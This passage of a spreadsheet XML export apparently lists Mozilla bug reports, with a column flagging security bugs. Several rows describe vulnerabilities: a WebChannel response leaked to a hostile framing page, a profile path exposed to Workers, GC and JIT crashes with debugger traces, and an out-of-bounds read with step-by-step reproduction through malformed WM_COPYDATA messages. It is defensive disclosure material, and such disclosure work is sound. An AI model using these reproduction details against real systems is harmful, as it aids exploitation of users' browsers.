mozjs.dll!NativeGetInline&lt;1&gt; - jsobj.cpp:4029
mozjs.dll!GetPropertyHelperInline&lt;1&gt; - jsobj.cpp:4200
mozjs.dll!GetPropertyHelper - jsobj.cpp:4209
mozjs.dll!GetPropertyOperation - interpreter.cpp:292
mozjs.dll!Interpret - interpreter.cpp:2323
mozjs.dll!RunScript - interpreter.cpp:446
mozjs.dll!ExecuteKernel - interpreter.cpp:630
mozjs.dll!Execute - interpreter.cpp:667
mozjs.dll!Evaluate - jsapi.cpp:5156
xul.dll!WorkerRun - scriptloader.cpp:660
xul.dll!Run - workerprivate.cpp:1705
xul.dll!RunSyncLoop - workerprivate.cpp:3612
xul.dll!LoadAllScripts - scriptloader.cpp:717
xul.dll!Load - scriptloader.cpp:945
xul.dll!ImportScripts - workerscope.cpp:419
mozjs.dll!CallJSNative - jscntxtinlines.h:218
mozjs.dll!Invoke - interpreter.cpp:489
mozjs.dll!Interpret - interpreter.cpp:2484
mozjs.dll!RunScript - interpreter.cpp:446
mozjs.dll!ExecuteKernel - interpreter.cpp:630
mozjs.dll!Execute - interpreter.cpp:667
mozjs.dll!Evaluate - jsapi.cpp:5156
Marking s-s until we know otherwise.</t>
        </is>
      </c>
      <c r="X1978" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" t="n">
        <v>1146724</v>
      </c>
      <c r="B1979" t="inlineStr">
        <is>
          <t>2015-03-23 18:47:36 -0700</t>
        </is>
      </c>
      <c r="C1979" t="inlineStr">
        <is>
          <t>Untrusted page can see webchannel responses</t>
        </is>
      </c>
      <c r="D1979" t="inlineStr">
        <is>
          <t>2018-02-08 09:35:51 -0800</t>
        </is>
      </c>
      <c r="E1979" t="n">
        <v>1</v>
      </c>
      <c r="F1979" t="n">
        <v>1</v>
      </c>
      <c r="G1979" t="n">
        <v>3</v>
      </c>
      <c r="H1979" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1979" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1979" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1979" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1979" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q1979" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1979" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1979" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1979" t="n">
        <v>1</v>
      </c>
      <c r="U1979" t="n">
        <v>0</v>
      </c>
      <c r="V1979" t="n">
        <v>74</v>
      </c>
      <c r="W1979" t="inlineStr">
        <is>
          <t>Created attachment 8582110
Demonstration of wrong page getting message response.
Consider:
* Untrusted page http://evil.com hosts trusted page http://good.com in an iframe.
* http://good.com dispatches a WebChannelMessageToChrome event - http://evil.com does not seem to have access to this event, but content.js does see it and dispatches it to the parent process - so far, so good.
* WebChannel.jsm sees the event as coming from http://good.com so allows it to be processed.
* WebChannel listener does it's thing and calls channel.send() to send the reply.
* http://good.com does *not* see the response, but http://evil.com does.
The following attachment demonstrates this in a test.  browser_web_channel_iframe.html is good.com in this scenario, and browser_web_channel.html is evil.com.  browser_web_channel.html sees the response to the message from browser_web_channel_iframe.html.
[Setting as a security bug as a precaution - eg, we send back about:support information in a webchannel response, and if the page we allow this on doesn't explicitly prevent itself being loaded in an iframe we could have a bad information leak]</t>
        </is>
      </c>
      <c r="X1979" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" t="n">
        <v>503797</v>
      </c>
      <c r="B1980" t="inlineStr">
        <is>
          <t>2009-07-12 14:34:21 -0700</t>
        </is>
      </c>
      <c r="C1980" t="inlineStr">
        <is>
          <t>Crash report pages are not well-formed; need escaped ampersand in "Get Help" URL and has an extra &lt;/div&gt;</t>
        </is>
      </c>
      <c r="D1980" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1980" t="n">
        <v>1</v>
      </c>
      <c r="F1980" t="n">
        <v>1</v>
      </c>
      <c r="G1980" t="n">
        <v>4</v>
      </c>
      <c r="H1980" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1980" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1980" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1980" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1980" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1980" t="inlineStr"/>
      <c r="Q1980" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1980" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1980" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1980" t="n">
        <v>1</v>
      </c>
      <c r="U1980" t="n">
        <v>0</v>
      </c>
      <c r="V1980" t="n">
        <v>18</v>
      </c>
      <c r="W1980" t="inlineStr">
        <is>
          <t>http://crash-stats.mozilla.com/report/index/6fca5dcc-14c0-46a4-b7a0-b630d2090712
http://validator.w3.org/check?uri=http%3A%2F%2Fcrash-stats.mozilla.com%2Freport%2Findex%2F6fca5dcc-14c0-46a4-b7a0-b630d2090712&amp;charset=%28detect+automatically%29&amp;doctype=Inline&amp;group=0
Thanks for the addition of the "Get Help" link on the crash pages. However, its URL has an unescaped ampersand in need of an "&amp;amp;". The hrefs for the cvsblame links are all properly escaped, so it's just this one link that should need changing for this.
The reason I care is that the addition of this is causing an error on parsing in my extension, Crash Report Helper:
https://addons.mozilla.org/en-US/firefox/addon/11217
Of course I could probably find a way to work around this, but it should be escaped so if someone would be so kind as to escape this one little character things should work again.</t>
        </is>
      </c>
      <c r="X1980" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" t="n">
        <v>827193</v>
      </c>
      <c r="B1981" t="inlineStr">
        <is>
          <t>2013-01-06 19:23:49 -0800</t>
        </is>
      </c>
      <c r="C1981" t="inlineStr">
        <is>
          <t>disclosure of profile directory name in JavaScript variable visible to Workers</t>
        </is>
      </c>
      <c r="D1981" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:07 -0800</t>
        </is>
      </c>
      <c r="E1981" t="n">
        <v>1</v>
      </c>
      <c r="F1981" t="n">
        <v>1</v>
      </c>
      <c r="G1981" t="n">
        <v>3</v>
      </c>
      <c r="H1981" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1981" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1981" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K1981" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1981" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1981" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q1981" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1981" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1981" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1981" t="n">
        <v>1</v>
      </c>
      <c r="U1981" t="n">
        <v>0</v>
      </c>
      <c r="V1981" t="n">
        <v>16</v>
      </c>
      <c r="W1981" t="inlineStr">
        <is>
          <t>Created attachment 698511
PoC html file
The variable "OS" in a Web Workers scope contains some peculiar information, among them:
OS['Constants']['Path']['profileDir'], which is the full path to the firefox profile directory, e.g. "/home/freddy/.mozilla/firefox/6efxvygfz.default". 
I know that the path name contains these random characters for security reasons. Although a quick search revealed no easy way to turn this path disclosure into a serious exploit I suppose it still poses a security risk.
If this is wrong, please uncheck the security-confidential flag.
I will attach a simple test case that explains the issue.</t>
        </is>
      </c>
      <c r="X1981" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" t="n">
        <v>1280680</v>
      </c>
      <c r="B1982" t="inlineStr">
        <is>
          <t>2016-06-17 10:01:57 -0700</t>
        </is>
      </c>
      <c r="C1982" t="inlineStr">
        <is>
          <t>Build support for l20n in Gecko/Firefox</t>
        </is>
      </c>
      <c r="D1982" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E1982" t="n">
        <v>1</v>
      </c>
      <c r="F1982" t="n">
        <v>1</v>
      </c>
      <c r="G1982" t="n">
        <v>7</v>
      </c>
      <c r="H1982" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1982" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1982" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1982" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1982" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1982" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1982" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1982" t="inlineStr">
        <is>
          <t>[gecko-l20n]</t>
        </is>
      </c>
      <c r="Q1982" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R1982" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1982" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1982" t="n">
        <v>1</v>
      </c>
      <c r="U1982" t="n">
        <v>0</v>
      </c>
      <c r="V1982" t="n">
        <v>11</v>
      </c>
      <c r="W1982" t="inlineStr">
        <is>
          <t>Filing this to get the build system part of l20n-in-gecko into the buglist.
The details will depend on the actual storage in a registry, which we figure out in bug 1280671.
I suggest to use the user story to describe the actionable details once we have them. P5 until this is actionable, HTH.</t>
        </is>
      </c>
      <c r="X1982" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" t="n">
        <v>1544841</v>
      </c>
      <c r="B1983" t="inlineStr">
        <is>
          <t>2019-04-16 09:08:29 -0700</t>
        </is>
      </c>
      <c r="C1983" t="inlineStr">
        <is>
          <t>Identify Documentation Quality Analyses we want to write in Q2</t>
        </is>
      </c>
      <c r="D1983" t="inlineStr">
        <is>
          <t>2019-11-12 10:38:48 -0800</t>
        </is>
      </c>
      <c r="E1983" t="n">
        <v>1</v>
      </c>
      <c r="F1983" t="n">
        <v>1</v>
      </c>
      <c r="G1983" t="n">
        <v>5</v>
      </c>
      <c r="H1983" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1983" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J1983" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K1983" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1983" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1983" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1983" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1983" t="inlineStr"/>
      <c r="Q1983" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1983" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1983" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1983" t="n">
        <v>1</v>
      </c>
      <c r="U1983" t="n">
        <v>0</v>
      </c>
      <c r="V1983" t="n">
        <v>4</v>
      </c>
      <c r="W1983" t="inlineStr">
        <is>
          <t>We need internal documentation for how to analyze search telemetry. I've written up a [project doc here](https://docs.google.com/document/d/1yWvm3l7AIfOFRHWZVupROaeRpI9jvcGZcGit1vhzKck/edit).
This bug tracks identifying what documents we want to write in Q2.</t>
        </is>
      </c>
      <c r="X1983" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" t="n">
        <v>757431</v>
      </c>
      <c r="B1984" t="inlineStr">
        <is>
          <t>2012-05-22 07:26:51 -0700</t>
        </is>
      </c>
      <c r="C1984" t="inlineStr">
        <is>
          <t>Assertion failure: v-&gt;toGCThing(), at gc/Marking.cpp:327 or Crash [@ js::gc::ArenaHeader::allocated]</t>
        </is>
      </c>
      <c r="D1984" t="inlineStr">
        <is>
          <t>2013-01-14 07:56:13 -0800</t>
        </is>
      </c>
      <c r="E1984" t="n">
        <v>1</v>
      </c>
      <c r="F1984" t="n">
        <v>1</v>
      </c>
      <c r="G1984" t="n">
        <v>3</v>
      </c>
      <c r="H1984" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1984" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1984" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1984" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1984" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1984" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1984" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1984" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1984" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1984" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1984" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T1984" t="n">
        <v>1</v>
      </c>
      <c r="U1984" t="n">
        <v>0</v>
      </c>
      <c r="V1984" t="n">
        <v>14</v>
      </c>
      <c r="W1984" t="inlineStr">
        <is>
          <t>Created attachment 625998
Test case for shell (run with -n -m -a)
The attached test asserts/crashes on mozilla-central revision 5586efaf687d (options -m -n -a).
Crash trace (debug build):
Program received signal SIGSEGV, Segmentation fault.
0x0804c753 in js::gc::ArenaHeader::allocated (this=0x0) at ../../gc/Heap.h:467
467             JS_ASSERT(allocKind &lt;= size_t(FINALIZE_LIMIT));
(gdb) bt 8
#0  0x0804c753 in js::gc::ArenaHeader::allocated (this=0x0) at ../../gc/Heap.h:467
#1  0x0804c7b7 in js::gc::ArenaHeader::getAllocKind (this=0x0) at ../../gc/Heap.h:497
#2  0x0806b1f5 in js::gc::Cell::getAllocKind (this=0x0) at ../gc/Heap.h:941
#3  0x080f29e0 in js::gc::GetGCThingTraceKind (thing=0x0) at /srv/repos/mozilla-central/js/src/jsgcinlines.h:30
#4  0x0832568e in js::gc::MarkKind (trc=0x86495b8, thingp=0xffffb48c, kind=JSTRACE_OBJECT) at /srv/repos/mozilla-central/js/src/gc/Marking.cpp:231
#5  0x08325c00 in js::gc::MarkValueInternal (trc=0x86495b8, v=0xf77021a0) at /srv/repos/mozilla-central/js/src/gc/Marking.cpp:330
#6  0x08325d2c in js::gc::MarkValueRoot (trc=0x86495b8, v=0xf77021a0, name=0x848f00a "vm_stack") at /srv/repos/mozilla-central/js/src/gc/Marking.cpp:352
#7  0x082b20cf in js::StackSpace::markFrameSlots (this=0x8616b30, trc=0x86495b8, fp=0xf7702160, slotsEnd=0xf77021b0, pc=0x8647dfe "W") at /srv/repos/mozilla-central/js/src/vm/Stack.cpp:501
(More stack frames follow...)
(gdb) x /i $pc
=&gt; 0x804c753 &lt;js::gc::ArenaHeader::allocated() const+21&gt;:       movzbl 0xc(%eax),%eax
(gdb) info reg eax
eax            0x0      0
S-s due to GC-related assertion with crash, until the crash is confirmed to be harmless and always a null-deref.</t>
        </is>
      </c>
      <c r="X1984" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" t="n">
        <v>1706501</v>
      </c>
      <c r="B1985" t="inlineStr">
        <is>
          <t>2021-04-20 16:26:07 -0700</t>
        </is>
      </c>
      <c r="C1985" t="inlineStr">
        <is>
          <t>Read beyond bounds in remoting server</t>
        </is>
      </c>
      <c r="D1985" t="inlineStr">
        <is>
          <t>2024-05-30 10:30:19 -0700</t>
        </is>
      </c>
      <c r="E1985" t="n">
        <v>1</v>
      </c>
      <c r="F1985" t="n">
        <v>1</v>
      </c>
      <c r="G1985" t="n">
        <v>3</v>
      </c>
      <c r="H1985" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1985" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1985" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K1985" t="inlineStr">
        <is>
          <t>Firefox 88</t>
        </is>
      </c>
      <c r="L1985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1985" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1985" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1985" t="inlineStr">
        <is>
          <t>[adv-main89+][adv-esr78.11+]</t>
        </is>
      </c>
      <c r="Q1985" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1985" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1985" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T1985" t="n">
        <v>1</v>
      </c>
      <c r="U1985" t="n">
        <v>0</v>
      </c>
      <c r="V1985" t="n">
        <v>20</v>
      </c>
      <c r="W1985" t="inlineStr">
        <is>
          <t>Created attachment 9217243
POC
`CommandLineParserWin::HandleCommandLine()` (toolkit\xre\CmdLineAndEnvUtils.h) reads beyond bounds when fed an unterminated string via a malformed `WM_COPYDATA` message. This message can be sent by a hostile program running in a different -- even a less-privileged -- account context than the victim instance of FF. [1]
The read beyond bounds could cause FF to navigate to a page that could injure the user, such as if the memory beyond the end of the string contains a site's access token. This is unlikely, but not inconceivable. [2]
Attached is a POC that demonstrates the bug. Use it thusly:
1. Create a VS console project and replace the VS-generated sample program with the POC. Build it.
2. Find a throwaway VM.
3. Ensure that no instances of FF are currently running on the system.
4. Run FF 88.0 using the default profile, from an elevated admin account cmd prompt.
5. Notice that FF runs in the admin account's context, but (fortunately!) disables the admin token.
6. Attach a debugger to FF's chrome process.
7. Set a BP on `CommandLineParserWin::HandleCommandLine()`.
8. Run the POC in a different, nonprivileged account than the one in which you ran FF.
9. When the BP fires, examine the `aCmdLineString` argument and notice that it begins with 8 bytes of 'a' (which is what the POC sent). There might or might not be an accidental "terminating" 0 following the last 'a'. Step the code and notice that it reads at least one byte beyond the 8 that the POC sent. Depending on your OS and memory layout, FF might crash attempting to read a no-access page.
10. Rebuild the POC with `BYTE_COUNT` == `128*1024`. Rerun the above sequence and notice that Windows puts the `WM_COPYDATA` message on the heap instead of the stack, potentially allowing longer reads beyond bounds.
The bug is in WinRemoteMessageReceiver::Parse() (toolkit/components/remote/winremotemessage.cpp), which assumes that `aMessageData-&gt;lpData` is null-terminated. It should instead use the count from `aMessageData-&gt;cbData`, which contains the exact number of bytes that Windows copied from the sender's context into FF's context.
[1] I will soon post a bug documenting other ways in which WM_COPYDATA can be accessed and abused or accidentally invoked, such as by a different instance of FF running in a different account's context. Probably other Windows messages can be abused similarly. I don't know how much FF can do to protect itself from these others.
[2] Windows copies small `WM_COPYDATA` messages onto the stack, the relevant portions of which contain local variables and stack-frame data related to handling the `WM_COPYDATA` message. Windows copies large `WM_COPYDATA` messages onto the heap, sometimes followed by a no-access page.</t>
        </is>
      </c>
      <c r="X1985" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" t="n">
        <v>1085624</v>
      </c>
      <c r="B1986" t="inlineStr">
        <is>
          <t>2014-10-20 13:50:36 -0700</t>
        </is>
      </c>
      <c r="C1986" t="inlineStr">
        <is>
          <t>Put our install intro information into the global intro info</t>
        </is>
      </c>
      <c r="D1986" t="inlineStr">
        <is>
          <t>2014-10-30 06:27:46 -0700</t>
        </is>
      </c>
      <c r="E1986" t="n">
        <v>1</v>
      </c>
      <c r="F1986" t="n">
        <v>1</v>
      </c>
      <c r="G1986" t="n">
        <v>4</v>
      </c>
      <c r="H1986" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1986" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1986" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1986" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1986" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1986" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1986" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1986" t="inlineStr"/>
      <c r="Q1986" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1986" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1986" t="inlineStr">
        <is>
          <t>108</t>
        </is>
      </c>
      <c r="T1986" t="n">
        <v>1</v>
      </c>
      <c r="U1986" t="n">
        <v>0</v>
      </c>
      <c r="V1986" t="n">
        <v>2</v>
      </c>
      <c r="W1986" t="inlineStr">
        <is>
          <t>Make this more like DXR this up per twitter/irc convo https://twitter.com/roberthelmer/status/524293995350851584</t>
        </is>
      </c>
      <c r="X1986" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" t="n">
        <v>1073627</v>
      </c>
      <c r="B1987" t="inlineStr">
        <is>
          <t>2014-09-26 11:53:38 -0700</t>
        </is>
      </c>
      <c r="C1987" t="inlineStr">
        <is>
          <t>Use community hub data for the Support Forum's Top Contributors list</t>
        </is>
      </c>
      <c r="D1987" t="inlineStr">
        <is>
          <t>2014-10-06 07:06:58 -0700</t>
        </is>
      </c>
      <c r="E1987" t="n">
        <v>1</v>
      </c>
      <c r="F1987" t="n">
        <v>1</v>
      </c>
      <c r="G1987" t="n">
        <v>5</v>
      </c>
      <c r="H1987" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1987" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1987" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1987" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1987" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1987" t="inlineStr">
        <is>
          <t>u=user c=questions p=1 s=2014.17</t>
        </is>
      </c>
      <c r="Q1987" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1987" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1987" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T1987" t="n">
        <v>1</v>
      </c>
      <c r="U1987" t="n">
        <v>0</v>
      </c>
      <c r="V1987" t="n">
        <v>5</v>
      </c>
      <c r="W1987" t="inlineStr">
        <is>
          <t>We currently are using the karma data to populate the list of top contributors. Now we have the community hub that has it's own utility functions to get the top contributors from elasticsearch data. Let's switch to that.
Given that our forums are now product based, we should show top contributors to be specific to the product the forum is for. That way each product will have it's own set of top contributors, giving more opportunities for contributors to make it on the list.</t>
        </is>
      </c>
      <c r="X1987" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" t="n">
        <v>652054</v>
      </c>
      <c r="B1988" t="inlineStr">
        <is>
          <t>2011-04-21 23:34:55 -0700</t>
        </is>
      </c>
      <c r="C1988" t="inlineStr">
        <is>
          <t>Crash running jellyfish demo on 64-bit</t>
        </is>
      </c>
      <c r="D1988" t="inlineStr">
        <is>
          <t>2013-01-14 08:26:29 -0800</t>
        </is>
      </c>
      <c r="E1988" t="n">
        <v>1</v>
      </c>
      <c r="F1988" t="n">
        <v>1</v>
      </c>
      <c r="G1988" t="n">
        <v>3</v>
      </c>
      <c r="H1988" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1988" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1988" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1988" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1988" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1988" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1988" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1988" t="inlineStr">
        <is>
          <t>[sg:critical?], [qa!]</t>
        </is>
      </c>
      <c r="Q1988" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1988" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1988" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T1988" t="n">
        <v>1</v>
      </c>
      <c r="U1988" t="n">
        <v>0</v>
      </c>
      <c r="V1988" t="n">
        <v>52</v>
      </c>
      <c r="W1988" t="inlineStr">
        <is>
          <t>BUILD: Current trunk nightly and my optimized self-build
STEPS TO REPRODUCE:
1)  Disable content methodjit
2)  Load http://chrysaora.com/
EXPECTED RESULTS: no crash
ACTUAL RESULTS: crash
ADDITIONAL INFORMATION: I submitted some nightly crash reports:
https://crash-stats.mozilla.com/report/index/bp-f730c485-b35c-4ba7-92dd-7793b2110421
https://crash-stats.mozilla.com/report/index/d66398e6-085a-4218-b732-dcaab2110421
https://crash-stats.mozilla.com/report/index/674db722-65e2-4950-bd31-f30272110421
Looks like a null-deref, but can't say more than that.  We're definitely crashing on trace.  Interestingly, my 32-bit debug build does NOT hit the crash.  My 64-bit builds do.  
I don't quite know where the null-deref comes from.  Some info from gdb:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000126ab3759 in ?? ()
(gdb) p $pc
$4 = (void (*)(void)) 0x126ab3759
(gdb) disas $pc-50 $pc+20
Dump of assembler code from 0x126ab3727 to 0x126ab376d:
0x0000000126ab3727:     add    %al,(%rax)
0x0000000126ab3729:     sbb    %al,0x66(%rax)
0x0000000126ab372c:     movd   %rsi,%mm4
0x0000000126ab3730:     mulsd  %xmm7,%xmm2
0x0000000126ab3734:     addsd  %xmm2,%xmm15
0x0000000126ab3739:     mov    $0x7ff8000000000000,%rsi
0x0000000126ab3743:     movd   %rsi,%xmm2
0x0000000126ab3748:     mulsd  %xmm5,%xmm1
0x0000000126ab374c:     addsd  %xmm1,%xmm15
0x0000000126ab3751:     xorps  %xmm1,%xmm1
0x0000000126ab3754:     cvtsd2ss %xmm15,%xmm1
0x0000000126ab3759:     movss  %xmm1,0x0(%rsi)
0x0000000126ab375e:     mov    $0x0,%esi
0x0000000126ab3763:     movd   %rsi,%xmm1
0x0000000126ab3768:     lea    0x34(%rbx),%rsi
0x0000000126ab376c:     lea    0x3c(%rbx),%rsi
(gdb) info reg rsi
rsi            0x7ff8000000000000       9221120237041090560
I guess 0x7ff8000000000000 is a non-canonical address and chances are that's what's killing us....  But not sure.
I can reproduce this at will, so if there's something else useful I can report, please let me know.</t>
        </is>
      </c>
      <c r="X1988" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" t="n">
        <v>682408</v>
      </c>
      <c r="B1989" t="inlineStr">
        <is>
          <t>2011-08-26 13:59:37 -0700</t>
        </is>
      </c>
      <c r="C1989" t="inlineStr">
        <is>
